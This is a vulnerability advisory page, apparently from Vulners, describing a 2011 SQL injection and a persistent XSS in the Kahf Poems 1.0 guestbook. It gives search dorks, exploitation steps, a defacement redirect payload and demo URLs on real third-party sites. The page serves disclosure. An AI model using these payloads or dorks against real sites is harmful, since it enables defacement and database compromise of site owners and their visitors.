Vulners
Lucene search
Kahf Poems 1.0 - Multiple Vulnerabilities
################################################################################################
[+] Title : Kahf Poems V1.0 (guestbook.php) SQL Injection
[+] Name : Kahf Poems
[+] Affected Version : v1.0
[+] Software Link : http://www.traidnt.net/vb/traidnt19736/
[+] Tested on : (L):Vista & Windows Xp and Windows 7
[+] Date : 13/08/2011
[+] Dork : "intitle:Kahf Poems -> v 1.0 beta" & "inurl:guestbook.php?diwan_id="
#################################################################################################
[+] Author : Yassin Aboukir
[+] Contact : [email protected]
[+] Site : http://www.yaboukir.com
#################################################################################################
[+] Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',10' at line 1
[+] How to exploit :
http://localhost/Path/guestbook.php?diwan_id=8&action=view&offset=1[SQL HERE]
[+] Fix : upgrade to last release (v3)
[+] Special Thanks to Ayoub Aboukir & All Friends ...
[+] Demos :
http://www.yaaam.com/poems/guestbook.php?diwan_id=8&action=view&offset=1'
http://www.yaaam.com/poems/guestbook.php?diwan_id=8&action=view&offset=5860'
################################################################################################
[+] Title : Kahf Poems V1.0 (guestbook.php) Persistent XSS
[+] Name : Kahf Poems
[+] Affected Version : v1.0
[+] Software Link : http://www.traidnt.net/vb/traidnt19736/
[+] Tested on : (L):Vista & Windows Xp and Windows 7
[+] Date : 13/08/2011
[+] Dork : "intitle:Kahf Poems -> v 1.0 beta" & "inurl:guestbook.php?diwan_id="
#################################################################################################
[+] Author : Yassin Aboukir
[+] Contact : [email protected]
[+] Site : http://www.yaboukir.com
#################################################################################################
[+] Details : Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
[+] How to exploit :
1- Go there : http://localhost/Path/guestbook.php?action=addnew&diwan_id=1 .
2- Put in Body field the XSS Code.
Example 1: <META http-equiv="refresh" content="0;URL=http://www.Deface-page.com"> .
Example 2: <script>alert('Xssed by The W0rm')</script>
3- Put anything in the other field ( Name & E-mail).
4- Now anyone go to the guestbook page will redirected to your own paege OR exploit your XSS Code.
[+] Fix : upgrade to last release.
[+] Special Thanks to Ayoub Aboukir & All Friends ...
[+] Demos :
http://www.yaaam.com/poems/guestbook.php?diwan_id=1&action=view&offset=0
http://www.alalarja.com/poems/guestbook.php?diwan_id=1&action=view&offset=0Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Aug 2011 00:00Current
7.4High risk
Vulners AI Score7.4